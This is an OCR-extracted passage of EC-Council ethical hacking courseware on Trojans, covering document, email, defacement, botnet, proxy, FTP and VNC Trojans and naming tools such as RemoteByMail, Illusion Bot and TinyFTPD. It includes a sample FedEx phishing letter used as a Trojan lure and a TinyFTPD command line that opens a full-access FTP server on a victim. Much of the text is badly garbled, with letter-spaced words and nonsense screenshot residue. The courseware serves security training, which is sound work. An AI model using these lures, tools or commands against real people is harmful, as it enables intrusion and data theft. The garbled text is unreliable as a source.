in e m a i l s , o f f i c e d o c u m e n t s , w e b p a g e s , o r m e d i a f i l e s s u c h as f l a s h a n d PDFs. W h e n a u s e r
o p e n s t h e d o c u m e n t w i t h t h e e m b e d d e d T r o j a n a s s u m i n g i t is a l e g i t i m a t e o n e , t h e T r o j a n is
i n s t a l l e d o n t h e v i c t i m ' s m a c h i n e . T h is e x p l o i t s t h e a p p l i c a t i o n u s e d t o o p e n t h e d o c u m e n t .
A tta c k e r s can th e n access s e n s itiv e d a ta a n d p e r f o r m m a lic io u s a c tio n s .
M o d u le 0 6 P ag e 8 74
A tta c k e r
m
A ttacke r em beds Trojan into
a W ord docum ent and infects
v ic tim com puter
® ‫ז־!!!־‬
s
m
Trojan is executed as victim opens the
document and clicks on Trojan package
FIGURE 6.13: Attacker infecting victim 's machine using Document Trojan
A n e x a m p le o f a T ro ja n e m b e d d e d in a W o r d d o c u m e n t is as fo llo w s :
VIA LETTER
John Stevens
R ^ a lC ^ m u n ir a U o n s C o m p a n y
445 152th Street S.W.
W ashington, DC 20554
FecEx
September
2, 2 0 1 2
r
RE: Fedex S hipm ent A irw a y Bill N um ber: 867676340056
Dear M r. Stevens:
W e have received a package addressed to yo u at the value o f USD 2,300.
The custom d u ty has not been paid for this shipm ent w hich is listed as
Apple iM a c 2 4 ' C om puter.
Please call us at Fedex at 1800-2 34-446 Fxt 3 4 5 0 r e-m ail m e a t
m . r o b c r t s ( S > f e d e x . c o m regarding th is shipm ent.
Please visit o ur Fedex Package Tracking w e b s ite to see m ore details
a bo u t th is sh ip m e n t and advice us on h o w to proceed. The w ebsite
lin k is attached w ith th is letter.
'•‫י‬-‫״‬-*
PackaQe
Trojan em b ed de d in
W ord d ocu m e nt
Sincerely,
M ich e lle Roberts
Custom er Service Representative
In te rn a tion a l S hipm ent and H andling
Fedex A tla n ta Division
Tel: 1800-234-446 Ext 345
h ttp ://w w w .fe d e x .c o m
m.rohertsgQfedex.com
M o d u le 0 6 P ag e 8 7 5
Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0l1nCil
FIGURE 6 .1 4 : A n e x a m p l e o f T r o ja n e m b e d d e d in a W o r d d o c u m e n t
E -m a il T ro j ans
CEH
J
A ttacker gains rem o te co n tro l of a victim com puter by sending email messages
J
Attackers can then re trie ve files or fo ld e rs by sending comm ands through email
J
Attacker uses open relay SMTP server and fakes the email's FROM field to hide
origin
'( m y
/
‫\ן‬
- \
7‫ן‬
In s tru c tio n s are se nt to
th e v ic tim th ro u g h em ails
A ny c o m m a nd s f o r me?
Send m e : \ c r e d i t c a r d . t x t
Here is th e re q ue sted file
file and launch calc.exe
Email
Calc.exe
execu ted
A tta cker
In te rn e t
Firew all
V ictim
Copyright G by EG-Gtlincil. All Rights Reserved. Reproduction is S trictly Prohibited.
E m a il
T ro ja n s
sp re a d
th ro u g h
b u lk
e m a ils .
T ro ja n
v iru s e s
a re
sent
th ro u g h
a tta c h m e n ts . T h e m o m e n t th e u s e r o p e n s th e e m a il, th e v ir u s e n te r s t h e s y s te m a n d s p re a d s
a n d c a u s e s a l o t o f d a m a g e t o t h e d a t a in t h e s y s t e m . It is a l w a y s r e c o m m e n d e d t h a t u s e r s n o t
o p e n e m a ils f r o m u n k n o w n users. S o m e tim e s e m a il T ro ja n s m a y e v e n g e n e r a te a u t o m a t ic m a il
a n d s e n d i t t o a ll t h e c o n t a c t s p r e s e n t in t h e v i c t i m ' s a d d r e s s b o o k .
T h u s , i t is s p r e a d t h r o u g h
t h e c o n t a c t lis t o f t h e i n f e c t e d v i c t i m .
A tta c k e rs se n d in s tru c tio n s t o th e v ic tim t h r o u g h e m a il. W h e n th e v ic tim o p e n s th e e m a il, th e
in s tru c tio n s w ill be e x e c u te d
a u t o m a t ic a lly . T h u s, a tta c k e rs can r e trie v e file s o r fo ld e r s by
s e n d in g c o m m a n d s th r o u g h e m a il.
T h e f o l l o w i n g fig u r e e x p la in s h o w an a tt a c k can be p e r f o r m e d u s in g e m a il T ro ja n s .
M o d u le 0 6 P ag e 8 76
I n s tr u c ti o n s a r • s e n t to
t h e v ic tim th r o u g h e m a il s
A ny c o m m a n d s f o r m e ?
Send m e : \ a r a d i t c a r d . t x t
H e r e is t h e r e q u e s t e d file
file a n d la u n c h c a lc .e x e
j!
Jp?
Email
; C d k .e x e
j e x e c u te d
I ‫*יין‬
* y rl•
A ttacke r
I n te r n e t
F ire w a ll
V ic tim
FIGURE 6.15: Illustrating the attack process using email Trojans
M o d u le 0 6 P ag e 8 77
E-mail Trojans: RemoteByMail
&
~
CmdseMecUed 0
?46^
Ertvai: :«nr
0
N ext eavjrf check
Nov* chociung
000900
7r
PO P p a tsw ad
Avohbfc ammand
last itspow
$t«t• No
CEH
SMTP Mfv«r
10/tjeAa oxn
co«*ttton
Aulherticaton
lo ‫־‬.« eaa
Progrmt
| Sane« POP
j]
SM TPuter
SMTP p a « w a d
So ltP w fe
p * t* < x l
canl
__
[**uM
nVo*•*•**00‫׳״‬
•>‫»<־‬s»np»ecQn»
1
_
y u te ri m a i» * « * 0
•«‫י״׳‬
6
‫״‬
‫«<׳‬
SS^SSoS “‫ ״‬- '
U
E AmIIUaAi Al TAA\SJV&AL19■
r o ja n s : A
R VeVmI I I V
o /I
t eV A
B / yJf A
M f iaa ii li
R e m o t e B y M a i l is u s e d t o c o n t r o l a n d a c c e s s a c o m p u t e r , i r r e s p e c t i v e o f its l o c a t i o n ,
s im p ly b y s e n d in g e m a il. W it h s im p le c o m m a n d s s e n t by e m a il to a c o m p u t e r a t w o r k o r at
h o m e , it can p e r f o r m t h e f o l l o w i n g ta sks:
0
R e t r i e v e s lis t o f f i l e s a n d f o l d e r s e a s i ly
0
Z ip s f i l e s a u t o m a t i c a l l y t h a t a r e t o b e t r a n s f e r r e d
0
H e lp s t o e x e c u t e p r o g r a m s , b a t c h f i l e s , o r o p e n s f i l e s
T h is is a n e a s i e r w a y t o a c c e s s f i l e s o r t o e x e c u t e p r o g r a m s o n a c o m p u t e r r e m o t e l y . T h e m a i n
s c r e e n d i s p la y s i n f o r m a t i o n t h a t t h e p r o g r a m h a s r e c e i v e d a n d p r o c e s s e d :
0
S t a r t S e r v e r : C lic k t h e S t a r t S e r v e r i c o n f o r R e m o t e B y M a i l t o b e g i n t h e p r o c e s s a n d
re c e iv e e m a il
0
S t o p : C lic k t h e S t o p i c o n t o s t o p t h e a p p l i c a t i o n a t a n y t i m e
0
C h e c k n o w : C hecks f o r n e x t s c h e d u le d e m a il
0
S t a t i s t i c s : D is p l a y s p r o g r a m i n f o r m a t i o n
0
L i s t e n i n g t o A c c o u n t s : D is p l a y s a c c o u n t s a n d a s s o c i a t e d e m a i l a d d r e s s e s
M o d u le 0 6 P ag e 8 78
0
E m a i l s r e c e i v e d : D is p la y s e m a i l lis t c o n t a i n i n g c o m m a n d s t h e p r o g r a m h a s r e c e i v e d
0
C o m m a n d q u e u e : D is p l a y s c o m m a n d s t h e p r o g r a m h a s r e c e i v e d b u t n o t y e t p r o c e s s e d
0
O u t g o in g e m a ils : C hecks f o r p ro c e s s in g e m a il
0
E m a i l s s e n d : D is p la y s lis t o f e m a i l s e n t b y R e m o t e B y M a i l
R e m o te B y M a il a cce p ts a nd e x e c u te s th e fo llo w in g c o m m a n d s :
0
H I: U s e d t o s e n d e m a i l w i t h t h e c o n t e n t " H i " t o y o u r e m a i l a d d r e s s
0
SEND: S ends file s lo c a te d o n th e h o s t c o m p u t e r t o y o u r e m a il a d d re s s
0
Z E N D : Z ip s a n d t h e n s e n d s f i l e s o r f o l d e r s l o c a t e d o n t h e h o s t c o m p u t e r t o y o u r
e m a il
a d d r e s s . T o o p e n a Z ip a t t a c h m e n t a f t e r y o u r e c e i v e , e n t e r t h e p a s s w o r d y o u
chose
w h e n yo u cre a te d th e a cc o u n t
0
E XEC UTE: E x e c u t e s p r o g r a m s o r b a t c h f i l e s o n t h e h o s t ' s c o m p u t e r
0
D IR : S e n d s t h e d i r e c t o r y o f a d r i v e o r f o l d e r t o y o u r e m a i l a d d r e s s
N» Accor• Too•
©
Ujf>
^
0 .0
D*•
ficm
C#•
>o>
3
Cm* im o M 0
E«m* mr*
0
Nerf«ooicr«d »C9CC
Hw c.'Kirg
POPtm!■wig
9w
SMTP Mfvw
IwHpwhcqn
SMTP‫*״‬
I
A»<hen*c«hoaj Same« POP 3
LMWtr
Om
To
‫•ז‬
SMTP
9$mm*
C1«MaM*ct«gM ifim
1
J
{*oJ&tyaMttCi•'*•*
itft
‫•יייי‬
nv.'/.'xn
‫ *• *־‬:fw'tng mk«I •C<«W1
w n / s m r m , v««
r
1a«7/7a»r«6 13pv
f*.0«‫ *־‬u+nnt* (,*mac**
✓0* I Xiw!
7 b* |
FIGURE 6.16: RemoteByMail screenshots
M o d u le 0 6 P ag e 8 79
D e fa c e m e n t T ro j ans
D e f a c e m
CEH
e n t T r o ja n s
D e fa c e m e n t T ro ja n s , o n c e s p re a d o v e r th e s y s te m , can d e s tr o y o r c h a n g e th e e n tire
c o n t e n t p r e s e n t in t h e d a t a b a s e . T h is d e f a c e m e n t T r o j a n is m o r e d a n g e r o u s w h e n a t t a c k e r s
t a r g e t w e b s i t e s ; t h e y p h y s i c a l l y c h a n g e t h e e n t i r e H T M L f o r m a t , r e s u l t i n g in t h e c h a n g e s o f
c o n t e n t o f t h e w e b s i t e , a n d e v e n m o r e lo s s o c c u r s w h e n t h i s d e f a c e m e n t t a r g e t s e - b u s i n e s s
a c t i v i t i e s . It a l l o w s y o u t o v i e w a n d e d i t a l m o s t a n y a s p e c t o f a c o m p i l e d W i n d o w s p r o g r a m ,
f r o m th e m e n u s t o th e d ia lo g b o x e s t o th e ic o n s a n d b e y o n d . R e s o u rc e e d ito r s a llo w y o u t o
v i e w , e d i t , e x t r a c t , a n d r e p l a c e s t r in g s , b i t m a p s , lo g o s , a n d i c o n s f r o m a n y W i n d o w s p r o g r a m .
T h e y a p p l y t a r g e t - s t y l e d C u s t o m A p p l i c a t i o n s (U C A s ) t o d e f a c e W i n d o w s a p p l i c a t i o n s . E x a m p l e
o f c a lc .e x e d e fa c e d :
M o d u le 0 6 P ag e 8 80
You A re Hacked! I !!!
View
Help
~~0.
D e fa c e d ca lc .e x e
E
C a l c u la t o r
1
I
Ibk*1m<«|i
ce
IZ ]
|6acfctfrace| |
You Aie Hacked! III! View heto
‫ןך‬
c
‫ן‬
0 q i t ‫׳ הכו‬z i p ■7]
0
‫ר ^ו ר ח ה־ו וז־וה־ו‬
1 " I I ‫ ׳‬jl ; ,[ ‫ ] י‬JM
E ‫ה־וה־־וו ו ה ח ה־ו‬
CE
|[ ~ C
0
0
‫ה ח ר־ו ה ח ה ח ה ח‬
0
0
0
‫ש‬0 ‫םש‬
0
□
□
0
□
FIGURE 6.16: An example of calc.exe defaced
D e f a c e m
e n t T r o ja n s :
R e s to r a to r
S ource: h t t p : / / w w w . b o m e . c o m
R e s t o r a t o r is a v e r s a t i l e s k in e d i t o r f o r a n y W i n 3 2 p r o g r a m s . T h e t o o l c a n m o d i f y t h e t a r g e t
in te rfa c e o f a n y W in d o w s 3 2 -b it p ro g r a m a n d th u s c re a te ta r g e t-s ty le d C u s to m A p p lic a tio n s
(U C A s ). Y o u c a n v i e w , e x t r a c t , a d d , r e m o v e , a n d c h a n g e i m a g e s , i c o n s , t e x t , d i a lo g s , s o u n d s ,
v i d e o s , v e r s i o n , d i a lo g s , a n d m e n u s in a l m o s t all p r o g r a m s .
T e c h n i c a l l y s p e a k i n g , i t a l l o w s y o u t o e d i t t h e r e s o u r c e s in m a n y f i l e t y p e s , f o r e x a m p l e . o c x
( A c t i v e X), .s c r (S c r e e n S a v e r ) , a n d o t h e r s . T h e a t t a c k e r c a n d i s t r i b u t e m o d i f i c a t i o n s in a s m a l l,
s e l f - e x e c u t i n g f i l e . It is a s t a n d a l o n e p r o g r a m t h a t r e d o e s t h e m o d i f i c a t i o n s m a d e t o a p r o g r a m .
Its G r a b f u n c t i o n a l l o w s y o u t o r e t r i e v e r e s o u r c e s f r o m f i l e s o n a t a r g e t ' s d is k .
R e s to ra to r
is t h e
B o rn e
fla g s h ip
p ro d u ct th a t
a llo w s
you
to
do
re s o u rc e
(re so u rce s
are
a p p l i c a t i o n - d e p e n d e n t d a t a t h a t t h e r e s p e c t i v e p r o g r a m m e r i n c l u d e s in t h e p r o g r a m ) e d i t i n g . It
is a u t i l i t y f o r e d i t i n g W i n d o w s r e s o u r c e s in a p p l i c a t i o n s a n d t h e i r c o m p o n e n t s , e .g ., f i l e s w i t h
.e x e ,
.d ll,
.re s ,
.rc,
and
.d c r
e x te n s io n s .
You
can
use
th is
fo r
tra n s la tio n /lo c a liz a tio n ,
c u s t o m i z a t i o n , d e s i g n i m p r o v e m e n t , a n d d e v e l o p m e n t . T h is r e s o u r c e e d i t o r c o m e s w i t h
an
i n t u i t i v e t a r g e t - i n t e r f a c e . Y o u c a n r e p l a c e l o g o s a n d c a n c o n t r o l r e s o u r c e f i l e s in t h e s o f t w a r e
d e v e l o p m e n t p r o c e s s . It c a n i n t r u d e i n t o t h e t a r g e t ' s s y s t e m a n d its w o r k i n g p r o g r a m s .
sto ra to r 2007 T ria l - C :\S o ftw a re \S o ftpe d ia.exe
File
‫ם‬
Resources
Viewer
a - n
Edit
a o
Tools
o
Help
,
Resouice Tree
a ]§ ) Softpedia.exe
B ^
String
2
S O
m m m m
Saving
Delphi/C++ Builder Forms
Neutr<
RCData
Codepage
Shell Integration
□ 11111
a l & Icon
□ MAIN I
Viewer
Text Editor
File Browser
RC Files
Advanced
3 IcD Version
□ 1
a t j
Manifest
1‫ □־־‬1
<L
1*1 Show T ooltips [default]
0 Allow multiple Restorator instances
1*1 Show splash screen on start
‫ ח‬Keep Restorator Window always on top
0 Ask for Folder, when assigning/extracting all [default]
Number of recently used files in file menu:
10
Number of recently found files in file menu:
20 ] [ j j
^
2>
OK
S tring\4089\Neutral
19
65426
In te g e r
o v e r flo w
20
21
65427
In v a lid
f lo a t in g
65428
F lo a tin g
p o in t
d iv is io n
22
65429
F lo a tin g
p o in t
o v e r flo w
23
65430
F lo a tin a
o o in t
u n d e r flo w
p o in t
o p e r a t io n
by
z e ro
1 open file
String
FIGURE 6.17: Restorator Screenshot
Botnet T ro jan s
0
CEH
J
Botnet Trojans infect a large num ber o f com puters across a large geographical
area to create a n e tw o rk o f bots th a t is controlled through a Command and
Control (C&C) center
J
Botnet is used to launch various attacks on a victim including denial-of-service
attacks, spamm ing, click fraud, and the th e ft o f financial inform ation
,0
0
0.
W ebsite
B otnet
Server
Copyright © by
C
l
-------
EG-GlDDCil. All Rights Reserved. Reproduction Is Strictly Prohibited.
B o tn e t T r o ja n s
A b o t n e t is a c o l l e c t i o n o f s o f t w a r e r o b o t s ( w o r m s , T r o j a n h o r s e s , a n d b a c k d o o r s )
t h a t r u n a u t o m a t i c a l l y . It r e f e r s t o a c o l l e c t i o n o f c o m p r o m i s e d m a c h i n e s r u n n i n g p r o g r a m s
under a com m on
com m and
a n d c o n tr o l in fr a s tr u c tu r e . A b o tn e t 's o r ig in a t o r (a tta c k e r) can
c o n t r o l t h e g r o u p r e m o t e l y . T h e s e a r e c o m p u t e r s (a g r o u p o f z o m b i e c o m p u t e r s ) i n f e c t e d b y
w o r m s o r T ro ja n s a nd ta k e n o v e r s u r r e p t it io u s ly by a tta c k e rs a n d b r o u g h t in to n e tw o r k s to
s e n d s p a m , m o r e v i r u s e s , o r l a u n c h d e n i a l o f s e r v i c e a t t a c k s . T h is is a c o m p u t e r t h a t h a s b e e n
in fe c te d a n d ta k e n o v e r b y an a tt a c k e r b y u s in g a v i r u s / T r o j a n / m a l w a r e .
B o tn e t o w n e r s u s u a lly t a r g e t e d u c a tio n a l, g o v e r n m e n t , m ilita r y , a n d o t h e r n e tw o rk s . W it h th e
h e l p o f b o t n e t s , a t t a c k s l ik e d e n i a l o f s e r v i c e , c r e a t i o n o r m i s u s e o f S M T P m a i ls , c l ic k f r a u d ,
t h e f t o f a p p l i c a t i o n s e r i a l n u m b e r s , l o g in IDs, c r e d i t c a r d n u m b e r s , e t c . a r e p e r f o r m e d .
M o d u le 0 6 P ag e 8 84
T ro ja n s a n d B ack d o o rs
B o tn e t
C&C S e r v e r
FIGURE 6.18: Illustrating the process of infecting company's website using Botnet Trojans
It h a s t w o m a i n c o m p o n e n t s :
©
B o tn e t
B o tm a s te r
T h e y t a r g e t b o t h b u s i n e s s e s as w e l l as i n d i v i d u a l s y s t e m s t o s t e a l v a l u a b l e i n f o r m a t i o n . T h e r e
a re fo u r b o t n e t to p o lo g ie s .
Q
H ie ra rc h a l
Q
M u lti S erver
Q
S ta r
e
R andom (M esh)
M o d u le 0 6 P ag e 8 85
Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-COUIICil
Botnet Trojan: Illusion Bot and
NetBot Attacker
Reload
‫״‬pdM*creMBOTBNOTirO1
11 Ho•* ’(U01
2jho* 1aaa1
1)HW
21
Pat 6567
Char ttctvsn
f \* 6667
Chan #ch*n
P*»:
*e*
Po»t
Dd«J araccs
Sot* 14. put
R
* Sock:5 oat
R
HP. PC*
R
‫ ״׳י‬Random tanpe
2001
Bindttwi. port
RCA ocim
‫ זגא‬ixccvcro
MD5 Cijpt
**‫ ״‬° OP * W a r IRCcharrel
,/ |Rr ,‫״‬
‫!י — * ״‬.*.,*,
CdrcMicc
1“ ‫ • ״‬M W
FbtdVduw
B o tn e t T r o ja n : I llu s io n
B o t a n d
N e tB o t A tta c k e r
I l l u s i o n B o t is a c l e a r G U I t o o l f o r c o n f i g u r a t i o n . W h e n t h i s b o t s t a r t s , i t c h e c k s t h e OS
v e r s i o n a n d i f i t d e t e c t s W i n 9 8 , i t c a lls t h e R e g i s t e r S e r v i c e P r o c e s s A P I t o h i d e t h e p r o c e s s
fro m
th e
Task
M a n a g e r.
The
b o t th e n
p ro c e e d s to
in s ta ll th e
ro o tk it
c o m p o n e n t.
If t h e
i n s t a l l a t i o n fa ils , t h e b o t t r i e s t o i n j e c t its c o d e i n s i d e t h e e x p l o r e r . e x e p r o c e s s .
I l l u s i o n B o t is a G U I t o o l .
F e a tu re s :
9
C & C c a n b e m a n a g e d o v e r IRC a n d HTTP
9
P r o x y f u n c t i o n a l i t y (S o c k s 4 , S o c k s 5 )
9
FTP s e r v i c e
9
M D 5 s u p p o rt fo r p a ssw o rd s
9
R o o tk it
9
C ode in je c tio n
9
C o l o r e d IRC m e s s a g e s
9
XP SP2 F i r e w a l l b y p a s s
9
DDOS c a p a b ilitie s
M o d u le 0 6 P ag e 8 86
N e tB o t
A tta c k e r
p ro v id e s
a s im p le
W in d o w s
Ul
fo r
c o n tr o llin g
a
b o tn e t,
re p o rtin g
and
m a n a g in g th e n e tw o rk , and c o m m a n d in g
a t t a c k s . It i n s t a l l s in
t o t h e s y s t e m in a v e r y s i m p l e
w a y s u c h as R A R f i l e
an
fo llo w in g ,
w ith
tw o
p ie c e s :
INI f i l e
(s e e t h e
o b s c u r e d ) a n d a s i m p l e EXE. T h e o r i g i n a l
N e t B o t A t t a c k e r is a
c a p a b ility a n d le ts y o u u p d a te th e b o t a n d
be a p a rt o f th e re s t o f th e b o tn e t.
9
Br^ry C \Doajmem and SettrgsSWinuxSPafo'Ma cto/ABOT6INARY E>‫־‬t —
Retoad
IRCAdnratKton
1
01> Jme h a sts
1| Hot* 10001
Port 6667
Chan BeHsn
Pats
2 Horf 10001
Port 6667
Chon Uchan
Paw * * ‫•ג‬
p a rtia lly
b a c k d o o r; th is to o l
e d ite d and
r e ta in s t h a t
flltac* Area Collective order U te 11
WEBA<*nrct140n
1| Most
Port
Path
21 Host
Port
Path
FHiesfi tr•*
i
wc
r * * j» mmc«
Socfc*4.pcr♦
R
* Soc*.»5. port
R
FTP port
R
«‫ ׳‬Random larnj? 2001
Bndshel port
■ 3000
R
IRC Acc*11
MD5 Crypt
BOT PASSWORD
O0km
* IntMl* M r* Dkvm
S*v# s«rv<at ‫׳‬.!*•« n ipgn'if
+ Colored RC nreuages
+ AutoOP admn onlRC channri * IRC t*rv«
+ Irtact cod• |rf dnvar fWc|
* Bypat 1XPSP2F•►**!
FbodV^jtt
«‫ ״‬Add to autobad
‫ם‬
Ext
|
Sava
About
FIGURE 6.18: Illusion Bot and NetBot Attacker Screenshots
Proxy S erver T ro jan s
,an
P r o x y T r o ja n
W
Trojan Proxy is usually a standalone application tha t
allows rem ote attackers to use the victim 's co m p u te r
.as a proxy to connect to the Internet
Proxy server Trojan, when infected, starts a hidden
proxy server on the victim 's com puter
Thousands o f machines on th e In te rn e t are infected
w ith proxy servers using this technique
In f e c t io n
| p
H id d e n
S e rv e r
• a S
A tta c k e r
© ‫־‬
V ic tim (P ro x ie d )
In te rn e t
1® ‫ ' ׳‬i
P ro c e s s
Target
company
P ro x y
S e r v e r T r o ja n s
A p r o x y s e r v e r T r o j a n is a t y p e o f T r o j a n t h a t c u s t o m i z e s t h e t a r g e t ' s s y s t e m t o a c t as a
p ro x y se rve r. A p ro x y s e rv e r T ro ja n , w h e n in fe c te d , s ta rts a h id d e n p r o x y s e rv e r o n th e v ic tim 's
c o m p u t e r . T h e a t t a c k e r c a n u s e t h i s t o c a r r y o u t a n y i l l e g a l a c t i v i t i e s s u c h as c r e d i t c a r d f r a u d ,
id e n tity
th e ft,
and
c o m m u n ic a te to
can
even
la u n c h
m a lic io u s
a tta cks
a g a in s t
o th e r
n e tw o rk s .
T h is
o t h e r p r o x y s e r v e r s a n d c a n a ls o s e n d a n e m a i l t h a t c o n t a i n s t h e
can
re la te d
in fo rm a tio n .
4 ! P ‫׳■׳־‬
A tta c k e r
V ic tim (P ro x ie d )
In te rn e t
T a rg e t
Company
FIGURE 6.19: Attacker infecting Target company's system using Proxy Server Trojans
M o d u le 0 6 P ag e 8 88
Proxy Server Trojan: W3 bPrOxy
Tr0 j 4 nCr3 4 t0 r (Funny Name)
J
W 3bPr0xy Tr0j4n is a
proxy server Trojan
which support m ulti
connection from
many clients and
re p o rt IP and ports
to mail o f the Trojan
ow ner
P ro x y
S e r v e r T r o ja n : W
( F u n n y
W 3 b P rO xy
3 b P r O x y
T r0 j4 n C r 3 4 t0 r
N a m e )
T r0 j4 n C r3 4 t0 r
is a p r o x y
s e rv e r T ro ja n
d e v e lo p e d
in
o rd e r to
access s y s te m s
r e m o t e l y . It s u p p o r t s m u l t i - c o n n e c t i o n s f r o m m a n y c l i e n t s a n d r e p o r t s IP a n d p o r t s t o t h e e m a i l
o f th e T ro ja n o w n e r.
M o d u le 0 6 P ag e 8 89
Listening Ports [Separate ports with a slmicolon (;)]
1 0 ;Z l; Z 2 ; 8 0 ; 8 1 ; 1 3 5 ; l3 6 ; « lM 1 2 ; 6 6 6 ; H 3 3 ; 1 4 3 4 ; 2 0 1 2 |
Z H T e c tm
%[Mndows system]
few f V o S f •
Welcomc to W3bPr0xy TrOHn Cr34tOr V.1.D
FIGURE 6.20: W3bPrOxy Tr0j4nCr34t0r detecting IP address
M o d u le 0 6 P ag e 8 90
CEH
F T P T ro jan s
S en d m e
\ c r e d i t c a r d . t x t file
(FTP Server
installed in
the
background)
H ere is th e re q u e s te d file
06/0 2 /2 0 1 2
09/0 6 /2 0 1 2
08/2 4 /2 0 1 2
05/2 1 /2 0 1 2
05/2 1 /2 0 1 2
06/0 4 /2 0 1 2
08/1 1 /2 0 1 2
1,024 ro d
0 abc. tz t
<0IR> A dventH et
0 AUTOEXEC .BAT
0 COBFIG.SYS
<0Ht> D ata
<0IR> Documents
V ictim
F T P T ro ja n : T in y F T P D
£53
FTP T rojans in sta ll an FTP
s e rv e r o n th e v ic tim 's m a ch in e ,
w h ic h o p e n s FTP p o rts
An a tta c k e r can th e n c o n n e c t
to th e v ic tim 's m a c h in e using
FTP p o rt to d o w n lo a d a ny file s
th a t e xist o n th e v ic tim 's
c o m p u te r
C o m m a n d P ro m p t
C :\D o c w e n ts and S e t t in g s \Acta11 n \D e sktop\T inyF T P D 21 55555 t e s t t e s t c : \
w in 98 a l l RHLCD
T in y FTPD V I . 4 By WinKggDrop
FTP S e rv e r I s S ta r te d
C o n t r o lP o r t :
21
B in d P o r t:
55555
UscrN asc:
te s t
Password:
te s t
B a a e D ir:
c : \ v in 9 8
A llo v d IP :
a ll
L o c a l A dd re ss:
1 9 2 .1 6 8 .1 6 8 .1 6
ReadAccess:
Yes
W n te A c c e s s :
Yes
L Is tA c c e s s :
Yes
C re a te A c c e s s :
Yes
D e le te A c c e s s :
Yes
E xe cu te A cce ss:
Yes
No
U klo d cA co e ss:
AnonyaousAccess No
Check T is e O at T hread C re a te d S u c c e s s fu lly
***************
0 C o n n e c tio n I s I n Use
F T P
T r o ja n s
A n FTP T r o j a n is a t y p e o f T r o j a n t h a t is d e s i g n e d t o o p e n p o r t 2 1 a n d m a k e t h e
t a r g e t ' s s y s t e m a c c e s s i b le t o t h e a t t a c k e r . It I n s t a ll s a n FTP s e r v e r o n t h e t a r g e t ' s m a c h i n e ,
a llo w in g th e
a tta c k e r to
g a in
access t o
s e n s itiv e
d a ta
and
d o w n lo a d /u p lo a d file s /p ro g ra m s
t h r o u g h t h e FTP P r o t o c o l . F u r t h e r , i t a l s o i n s t a l l s m a l w a r e o n t h e t a r g e t s s y s t e m . C r e d i t c a r d
i n f o r m a t i o n , c o n f i d e n t i a l d a t a , e m a i l a d d r e s s e s , a n d p a s s w o r d a t t a c k s c a n a ls o b e e m p l o y e d
w h e r e o n ly t h e a t t a c k e r g a in s access t o t h e s y s te m .
FTP Server
Send me
c : \ c r e d i t c a r d . t x t file
(ft
V u lu a ic I n d r i v e C h a s no l a b e l .
(FTP S erver
in s ta lle d in
th e
9 5 V *•
Hacker
b a ckg ro un d )
Here is th e requested file
Voluae Serial Nunber is D45E-9FRE Directory of C:\
06/02/2012 1,024 -rnd
09/06/2012 0 abc.txt
0 8 /2 4 /2 0 1 2 <D1K> A d v e n tN e t
05/21/2012 0 AUTOEXEC.BAT
05/21/2012 0 CONFIG.SYS
06/04/2012 <DIR>Data
08/11/2012 <DIR>Documents and
Victim
FIGURE 6.21: Attacker infecting victim 's system using FTP Trojans
F T P T r o ja n : T in y F T P D
C:\Documents and Settings\Admin\Desktop\TinyFTPD 21 55555 t e s t t e s t c : \
win98 a l l RWLCD
Tiny FTPD V I.4 By WinEggDrop
FTP S erver I s S ta rte d
C o n tro lP o rt:
21
B indPort:
55555
UserName:
te s t
Password:
te s t
HomeDir:
c:\w in98
Allowd IP:
a ll
Local Address:
192.168.168.16
ReadAccess:
Yes
W riteA ccess:
Yes
L IstA ccess:
Yes
C reateA ccess:
Yes
D eleteA ccess:
Yes
ExecuteA ccess: Yes
UnlockAccess:
No
AnonymousAccess: No
Check Time Out Thread C reated S u ccessfu lly
*************** w aitin g For New Connection
0 Connection Is In Use
FIGURE 6.22: TinyFTPD Screenshot
CEH
V N C T ro jan s
VNC Trojan starts a VNC Server daem on in th e infected system
It connects to th e victim using any VNC vie w e r w ith th e password
"se cre t‫״‬
i
Since VNC program is considered a u tility , this Trojan w ill never
be detected by an ti virus
Command and
control instruction
f
A tta c k e r
t
V ic tim
VNC S e rver
V N C
T r o ja n s
V N C T r o j a n s a l l o w a t t a c k e r s t o u s e t h e t a r g e t ' s c o m p u t e r as a V N C s e r v e r . T h e s e
T r o j a n s w o n ' t b e d e t e c t e d b y a n t i v i r u s e s a f t e r t h e y a r e r u n , b e c a u s e V N C S e r v e r is c o n s i d e r e d a
u tility .
P e r fo r m s t h e f o llo w in g fu n c t io n s w h e n it in fe c ts th e s y s te m :
0
S t a r t s V N C S e r v e r d a e m o n in t h e b a c k g r o u n d w h e n i n f e c t e d
0
C o n n e c ts t o t h e t a r g e t u s in g a n y V N C v i e w e r w i t h t h e p a s s w o rd " s e c r e t "
Command and
co n tro l in stru ctio n
VNC Traffic
A tta c k e r
V ic tim
VNC S e rver
FIGURE 6.23: Attacker uses victim 's com puter as VNC server using VNC Trojans
VNC Trojans: WinVNC and VNC
Stealer
E M
Itk.ul IUcIm
Incoming Connections
®
OK
f? Accept Socket Connections
Display Number
imttiM
V N C S t e a le r
W in V N C
WinVNC: C u rre n t U ser P r o p e r tie s
- _‫״‬
|
[~
I? Auto
OS
Cancel
Apply
Password:
r*
Accept CORBA Connect.':.'!
r
Disable Remote Keyboard t Pooler
r
Disable Local Keyboard & P o rter
Ftp •Settings
Host:
Update Hatvftng
r
f ? P o l Foreground W indow
F
P o l Consoie
Windows Only
Poll Ful Screen
1‫־‬
^
Pol W rtdow Under Cusor
‫־‬
V N C
T r o ja n s : W
in V N C
a n d
V N C
S te a le r
W in V N C a n d V N C S t e a l e r a r e t w o V N C T r o j a n s .
W in V N C
W in V N C is u s e d f o r a r e m o t e v i e w o r t o c o n t r o l a W i n d o w s m a c h i n e s o t h i s b e c o m e s
a t h r e a t a s a t t a c k e r s a r e a b l e t o i n je c t a T r o ja n i n t o t h e s y s t e m a n d t h e n t h e y a r e a b l e t o a c c e s s
t h e t a r g e t 's s y s t e m r e m o t e l y .
V N C
S te a le r
V N C S t e a l e r is a T r o j a n w r i t t e n in V isu a l B a sic . V N C.EX E h a s b e e n u s e d t o p e r f o r m t h e
f o llo w in g b e h a v i o r :
9
T h e p r o c e s s is p a c k e d a n d / o r e n c r y p t e d u s in g a s o f t w a r e p a c k in g p r o c e s s
9
C r e a te s s y s te m tr a y p o p - u p s , m e s s a g e s , e r r o r s , a n d s e c u r ity w a r n in g s
9
A d d s p r o d u c t s t o t h e s y s t e m r e g is t r y
9
W r i t e s t o a n o t h e r P r o c e s s 's V ir tu a l M e m o r y ( p r o c e s s h ija c k in g )
9
E x e c u te s a p r o c e s s
9
